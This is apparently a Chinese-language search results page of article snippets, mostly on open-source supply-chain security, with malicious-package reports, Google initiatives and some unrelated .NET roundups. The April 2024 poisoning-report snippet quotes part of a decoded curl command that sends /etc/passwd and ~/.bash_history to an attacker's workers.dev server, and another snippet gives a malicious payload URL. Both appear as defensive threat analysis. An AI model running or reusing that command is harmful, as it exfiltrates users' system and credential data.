- 综合排序
- 最热优先
- 最新优先
- 来自专栏旅途散记
谷歌的开源供应链安全
今天的演讲主题是Google的开源供应链安全。首先,让我们了解一下“供应链安全”到底是什么意思。通常,当我们谈论供应链安全时,是指针对供应链攻击的工程防御。现在,我们需要定义什么是供应链攻击。 译者备注: XcodeGhost源码地址[4] 相关报道[5] 苹果手机病毒感染事件——震惊业界的 XcodeGhost[6] XcodeGhost风波[7] 再进一步的例子包括 瞻博网络[8](Juniper copay是开源的,但事件流是开源的,所以这是一个开源供应链攻击。代码在两个半月的时间里都没有被发现,你知道攻击者是如何开展行动的? xpdf 中的问题是一项错误,log4j中的问题是一个功能,他们都不是恶意的,但是都是供应链的重要组成部分.因此让我们扩大供应链漏洞的定义,将开源供应链漏洞定义为由开源组件引起的可信软件中的可利用弱点。 现在我们可以将开源供应链安全定义为防御开源供应链攻击和开源供应链漏洞的工程。
61610编辑于 2023-12-19 供应链投毒预警 | 开源供应链投毒202401最新月报来啦!
概述悬镜供应链安全情报中心通过持续监测全网主流开源软件仓库,结合程序动静态分析方法对潜在风险的开源组件包进行分析和监测,捕获大量开源组件恶意包投毒攻击事件。 2024 年 1 月份,悬镜供应链安全情报中心在 Npm 官方仓库(https://www.npmjs.com/)和 Pypi 官方仓库(https://pypi.org/)上共捕获 675 个不同版本的恶意投毒包 url 为:https://gist.github.com/KaravayevAlexei/bdf4f9e280714d87303d4909d19de3a7/raw/3163e9c9ff618c50a8d8a9f60053a3683985e351 详细分析请参考:供应链投毒预警 | 恶意 Py 包仿冒 tensorflow AI 框架实施后门投毒攻击DNS 查询外传敏感信息该攻击方式是一种较为隐蔽的信息窃取手法,通常在包管理器安装或者加载投毒包时自动执行用于收集受害者系统敏感数据的 悬镜供应链安全情报中心将持续监测全网主流开源软件仓库,对潜在风险的开源组件包进行动态跟踪和溯源,实现快速捕获开源组件投毒攻击事件并第一时间提供精准安全预警。
76210编辑于 2024-03-02- 来自专栏云云众生s
开源安全供应链走向成熟的2023年
事实上,它与现代开发那么交织在一起,以至于代码所有者通常不知道自己软件中的开源组件。" 唉。 正如Synopsys报告的那样,"确保软件供应链安全的第一步是管理应用程序中的开源和第三方代码。 如果您无法有效管理和确保开源和第三方软件的安全性,那么为确保供应链安全所做的任何其他努力都将失效 - 或者坦率地说,甚至无关紧要。" Synopsys没有说错。 虽然2023年的大部分主要安全改进都是针对软件供应链的,但还有其他重大进展。其中之一是漏洞利用可能性交换(VEX)及其开源实现OpenVEX的兴起。 开发者安全公司Snyk在其2023年软件安全调查中发现,尽管针对开源代码的网络攻击数量创历史新高,但40%的受访者仍然不使用关键的供应链安全技术。 当然,公司知道存在问题,但Synk发现他们正在特殊的基础上解决供应链安全问题。只有一半的公司有正式的供应链安全策略。 我们在2024年的安全任务很清晰。
38810编辑于 2024-03-28 - 来自专栏SDNLAB
开源软件的供应链是否存在安全风险?
去年发生了一些令人震惊的攻击,这使得开源软件供应链的安全性备受质疑。 那么,这是否意味着开源软件可以安全地再次使用? 答案是不完全是,企业为了更好地保护自己,需要了解开源软件供应链的工作原理,我们生活中几乎所有的设备都包含一个嵌入式开源软件和运行时库的复杂系统。 不幸的是,要理解别人上传的软件非常困难,人们可能会恶意地改变供应链中的数据包或库。 无论你在开源供应链中的角色如何,如果我们要防范未来的攻击,必须对安全性给予更多的关注。安全专业人员通过默默无闻的方式熟悉安全性,他们错误地认为,如果软件很难理解,就很难发起攻击。 去年的攻击表明,通过滥交(将开放源代码无管理地纳入软件供应链)带来的不安全感是我们面临的新的问题。
1.1K50发布于 2018-06-11 - 来自专栏新智元
谷歌IBM等8家技术公司推出开源API Grafeas,统一管理软件供应链
【新智元导读】谷歌、IBM 和其他一些科技公司联合推出了开源 API Grafeas,能够存储、查询和检索所有类型软件组件的重要元数据,帮助企业构建规模尺度上的安全和管理的综合模型,为企业定义统一的方式来审计和管理其软件供应链 谷歌、IBM 和其他一些科技公司推出了 Grafeas,一个开源API,用于存储、查询和检索所有类型软件组件的重要元数据。 与 IBM、Aqua Security、BlackDuck、CoreOS、JFrog、Red Hat 以及Twistlock 合作开发了Grafeas,一个旨在为企业定义统一的方式来审计和管理其软件供应链的开源项目 作为一个新设立的联合开源项目,Grafeas 为用户提供了一个标准化的方式,便于其审核和管理他们的软件供应链。 该项目的主要重点是开发作为开放源代码工件元数据API 的开源Grafeas API。 存储、查询和检索软件工件元数据(无论存储数据的位置或软件工件类型是什么)的能力使得公司可以在不同环境中获得其软件供应链360 度的视图。
1.3K60发布于 2018-03-21 - 来自专栏深度学习与python
如何保护你的开源项目免遭供应链攻击
如果你是一个开源维护者,当你了解了项目的攻击面以及项目整个供应链的威胁载体,你可能会感到不知所措,甚至觉得无法克服。好消息是,2021 年也是供应链安全解决方案年。 虽然还有很多工作要做,现有的解决方案也有很大的改进空间,但已经可以对项目进行预防性控制,以强化供应链,免受安全威胁。 本文最初发表于谷歌开源博客,由 InfoQ 中文站翻译并分享。 本文介绍了相关问题、答案和预防选项,如果你想保护自己的开源项目免受供应链攻击,那么这是一份不错的初级指南。 问题 8:从注册中心选择工件时应该注意什么? 1. 答:选择经过加密和签名验证的工件 2. 不要使用过于古老的组件 3. 时间戳:只使用最近创建的工件 4. 开源项目安全性的相关资源: SLSA:一个供应链安全等级框架 Scorecards:安全最佳实践应用评价工具 Allstar:一个确保采用安全最佳实践的 GitHub 应用 Open Source Insights
88330编辑于 2022-04-19 - 来自专栏FreeBuf
为强化软件供应链安全,谷歌启动GUAC开源项目
10月20日,Google宣布正在为名为Graph for Understanding Artifact Composition(GUAC)的开源项目寻找感兴趣的贡献者,以此进一步强化软件供应链安全。 GUAC旨在让每个组织都可以只有访问和调用这些信息,正在发挥开源的共享和民主的特性。 谷歌多手段强化供应链安全 在启动GUAC开源项目之前,谷歌在供应链安全方面已经有了多个动作。 2021年8月,谷歌进一步推出软件供应链漏洞赏金计划,以识别横跨多个项目的安全漏洞,其中包括赫赫有名的Angular、Bazel、Golang、Protocol Buffers 和 Fuchsia。 支撑此架构的数据来自Sigstore、GitHub、开源漏洞( OSV )、Grype和Trivy等,以在漏洞、项目、资源、开发人员、工件和存储库之间建立有意义的关系。
51130编辑于 2022-11-14 - 来自专栏OpenSCA
供应链投毒预警 | 开源供应链投毒202404月报发布(含投毒案例分析)
概述悬镜供应链安全情报中心通过持续监测全网主流开源软件仓库,结合程序动静态分析方式对潜在风险的开源组件包进行动态跟踪和捕获,发现大量的开源组件恶意包投毒攻击事件。 投毒案例分析本节将从4月份捕获的开源组件恶意包中选取部分具有代表性的投毒样本进行分析、还原投毒攻击细节。 这些恶意包具有相同的攻击代码以及相同的高版本号(99.0),可推断攻击者尝试进行包依赖混淆(Dependency Confusion)供应链投毒。 ,进一步解码后获取第三阶段真实的恶意bash代码解码(如下所示),其主要目的是将系统密码文件/etc/passwd、bash历史文件~/.bash_history 外传到攻击者服务器(https://8b53a8d8a1c2 " -H "Content-Type: text/plain" https://8b53a8d8a1c2.sherlockshat007.workers.dev此外在4月4号,我们在Pypi仓库捕获到的恶意
1.1K10编辑于 2024-05-21 - 来自专栏FreeBuf
重大供应链威胁!这个 Java 开源框架存在严重漏洞
美国网络安全和基础设施安全局(CISA)的安全研究人员报告称,一个受广泛使用的开源Java框架中存在严重漏洞并被攻击者利用,以向未打补丁的服务器部署后门。 专家表示,这种情况可能会对未打补丁的软件构成重大供应链威胁。 供应链面临风险 当Huntress对该漏洞进行分析时,没有证据表明存在主动利用的情况。 这对攻击者来说无疑是利好的,同时这可能给供应链带来重大风险。
59410编辑于 2023-03-29 - 来自专栏米扑专栏
Android 8款开源游戏引擎
项目地址:http://code.google.com/p/alien3d/ 8、Catcake Catcake是一款跨平台的Java 3D图形引擎,目前支持PC(J2SE)及Android环境运行(已有
4.9K30发布于 2019-02-19 - 来自专栏DotNet NB && CloudNative
盘点8个.Net开源项目
今天一起盘点下,6月份推荐的8个.Net开源项目。 3、一个支持WinForms换肤的开源组件 这是一个支持自定义WinForms窗口、控件颜色、禁用状态、动画效果的皮肤组件。 6、推荐一个Excel与实体映射导入导出的C#开源库拖 这是一个C#开发的、用于将Excel文件映射为对象模型的开源工具,同样可以轻松将对实体对象存储为Excel格式文件。 7、一个高性能、低内存文件上传流.Net组件 一个基于 .NET 平台的开源项目,提供了一个简单易用的 API,可以在 Web 应用程序中快速集成文件上传功能。 8、一个C#跨平台的机器视觉和机器学习的开源库 它是OpenCV的.NET封装版本,项目名称为EmguCV,它使得.NET开发人员能够调用OpenCV函数,从而快速建立复杂的视觉应用。
1.3K40编辑于 2023-08-30 - 来自专栏绿盟科技研究通讯
开源软件供应链安全系列:OSS风险点与预防
软件供应链安全包括两部分,一是引入的开源组件包中存在漏洞,二是引入的开源组件包中存在攻击者精心制作的恶意代码。 根据Google安全团队的报告,Maven生态中超过8%的第三方库都受到Log4j漏洞的影响。 开源软件供应链安全攻击风险点 开源软件除了引入漏洞等不安全因素,在使用的过程中还包含人为攻击的各种风险点。 开源软件供应链安全防护措施 目前这两年针对软件供应链的产品逐渐完善,形成针对各个流程的安全防护手段,下面主要概述针对开源软件供应链攻击的防护措施。 开源软件供应链安全研究综述. *软件学报*, 0-0. 3. CodeWisdom.技术科普:浅谈开源软件供应链风险.
1.8K20编辑于 2023-02-22 - 来自专栏汇智网教程
基于超级账本Fabric的供应链跟踪解决方案【开源】
本项目为基于Hyperledger Fabric区块链的供应链资产跟踪解决方案,项目主要包括链码和Web应用两部分。
1.5K30发布于 2019-03-29 - 来自专栏DotNet NB && CloudNative
盘点8个热门.Net开源项目
下面一起盘点3月份推荐的8个.Net开源项目。 二、ZLinq:意在替代Linq的高性能.Net开源库 项目地址: https://github.com/Cysharp/ZLinq ZLinq 是一个由 Cysharp 团队开发的开源项目,目标是为所有 它声称是最快的开源 C# 网页浏览器,渲染网页的速度比谷歌浏览器还快,因为其使用轻量级的 CEF 渲染器。 经过比较所有可用的 .NET 浏览引擎后,项目团队最终选择了高性能的 CefSharp。 ://github.com/artiomchi/FlexLabs.Upsert FlexLabs.Upsert是一个为Entity Framework Core(EF Core)提供Upsert功能的开源库 = v.Visits + 1, // 定义更新逻辑 }); // 执行Upsert操作 await upsert.RunAsync(); 五、Squidex:一个基于.Net功能强大的CMS开源项目
83310编辑于 2025-05-09 - 来自专栏DevOps
开源KMS之vault part8
https://developer.hashicorp.com/vault/api-docs/system/policies-password
31210编辑于 2024-06-03 - 来自专栏全栈程序员必看
k8s 开源_openstack源码
Create->CreateWithOptions->createResource
33610编辑于 2022-09-22 - 来自专栏深度学习与python
从 10 万 npm 用户信息被窃看开源软件供应链安全
作者 | 赵钰莹 如今,所有热爱开源的开发者可能都心怀担忧:开源软件的供应链安全问题如何解决? 关于开源代码维护者因反俄给 node-ipc 库添加恶意代码、GitHub 封停部分俄罗斯开发者账号的讨论还未结束,10 万 npm 用户账号信息被窃再登 HN 热搜,开源软件供应链的安全性成为业界关注的焦点话题 具体为: 《软件供应链安全保障基本要求》 中国通信标准化协会标准 开源软件合规性问题解答 InfoQ:开源协议及其基金会在整个开源软件供应链中扮演着一个什么样的角色,他们具体能解决哪些问题? Gavin:站在软件供应链安全的角度,开源只是其中一部分,但目前绝大多数安全事件都是因为开源软件导致的,所以大家潜移默化会把软件供应链安全与开源软件漏洞紧密结合起来。 InfoQ:目前在整个开源软件供应链里面最常见的法律合规性的问题是什么?企业应该怎么应对这些问题?
65010编辑于 2023-03-29 - 来自专栏Qt项目实战
Qt开源作品8-通用控件移动
->widget = widget; this->widget->installEventFilter(this); } } 三、效果图 [movewidget.gif] 四、开源主页 以上作品完整源码下载都在开源主页,会持续不断更新作品数量和质量,欢迎各位关注。
1K20发布于 2020-05-13 - 来自专栏RASP社区
GOTC演讲回顾|基于代码疫苗技术的开源软件供应链安全治理
在“聚焦开源安全”分论坛中,悬镜安全COO董毅进行了以“基于代码疫苗技术的开源软件供应链安全治理”为题的主题分享,围绕“代码疫苗技术”给出了一套覆盖治理与运营全流程的开源安全解决方案。 Gartner认为,到2025年,全球45%的组织会受到软件供应链攻击,比2021年增长三倍。近几年,重大的软件供应链攻击事件很多都与开源漏洞相关。开源供应链面临着严峻的安全风险。 站在供应链安全的角度,软件在开发、供应、使用这三大环节中都面临相应的安全风险。因此,每个环节都需要技术抓手来协助解决安全问题。悬镜安全核心的代码疫苗技术正是企业进行供应链安全治理的技术切入点。 包括但不限于: 基于真实攻击事件生成数据,您需要的所有内容均包含在同一条日志记录中 提供多种维度的图、表协助您的团队进行数据分析 对接至其他SIEM平台或自研风险度量平台与您的其它数据汇总分析 3.落地方案 开源软件供应链安全治理痛点 悬镜从以下三个方面提出一体化的应用安全落地要点,将基础环境、代码和安全能力进行整合,共同打造供应链安全场景下的应用防护能力。 1.
47110编辑于 2023-06-25 - 来自专栏腾讯安全应急响应中心
【安全通知】NPM遭遇供应链投毒攻击窃取K8S集群凭证
由于国内开源镜像站均同步于NPM官方仓库,所以该问题不仅会通过官方仓库,还可能通过各个开源镜像站影响广大用户。 腾讯安全应急响应中心(TSRC)秉承共建安全生态的原则,在此建议各开源镜像站以及对开源镜像站有依赖的组织和公司,请尽快自查处理,确保恶意库得到清除,保障用户安全。 图片 2.png 其中 kubeconfig 文件 是用于配置k8s集群访问信息的文件。 此外,k8s 的组件都可以使用 kubeconfig 连接 apiserver,client-go 、operator、helm 等其他组件也使用 kubeconfig 访问 apiserver。 源头之战,不断升级的攻防对抗技术 —— 软件供应链攻击防御探索 兵无常势,水无常形,黑客投毒的手法越来越隐蔽,攻防对抗的难度也随之不断升级,唯有一直紧跟技术发展趋势,持续不断进阶,才能在安全攻防对抗中取得先机
98210发布于 2021-02-24
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号